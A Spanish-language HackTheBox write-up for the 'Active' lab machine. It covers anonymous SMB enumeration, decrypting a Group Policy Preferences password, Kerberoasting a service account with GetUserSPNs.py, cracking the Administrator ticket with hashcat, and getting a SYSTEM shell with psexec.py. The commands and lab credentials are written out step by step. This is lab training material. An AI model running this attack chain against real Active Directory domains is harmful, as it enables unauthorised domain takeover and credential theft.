write-ups / hackthebox / active-htb

HackTheBoxeasyWindows

Active — Kerberoasting en Active Directory

Explotación de Active Directory en la máquina Active de HTB. Enumeración SMB anónima, extracción de credenciales GPP y Kerberoasting para obtener Administrator.

11 de mayo de 20241 min read
HTBActive DirectoryKerberoastingSMBGPP

Reconocimiento

bash
nmap -sV -sC -oN active.nmap 10.10.10.100

Puertos abiertos: 53 (DNS), 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP), 464 (kpasswd), 636 (LDAPS). Claramente un Domain Controller con Active Directory.

Enumeración SMB

bash
smbclient -N -L //10.10.10.100
El share
bash
Replication
es accesible sin credenciales. Dentro encontramos archivos de Group Policy Preferences (GPP).
bash
smbclient -N //10.10.10.100/Replication
cd active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/
get Groups.xml

Credenciales GPP

El archivo
bash
Groups.xml
contiene una contraseña cifrada con AES-256 de Group Policy Preferences:
bash
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
Credenciales obtenidas:
bash
SVC_TGS:GPPstillStandingStrong2k18

Kerberoasting

Con las credenciales del usuario de servicio, realizamos un ataque de Kerberoasting contra Active Directory:

bash
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

Obtenemos el ticket TGS del usuario Administrator. Lo crackeamos:

bash
hashcat -m 13100 ticket.hash /usr/share/wordlists/rockyou.txt
Password:
bash
Ticketmaster1968

Acceso como Administrator

bash
psexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
Shell como
bash
NT AUTHORITY\SYSTEM
.

Flags

bash
type C:\Users\SVC_TGS\Desktop\user.txt
type C:\Users\Administrator\Desktop\root.txt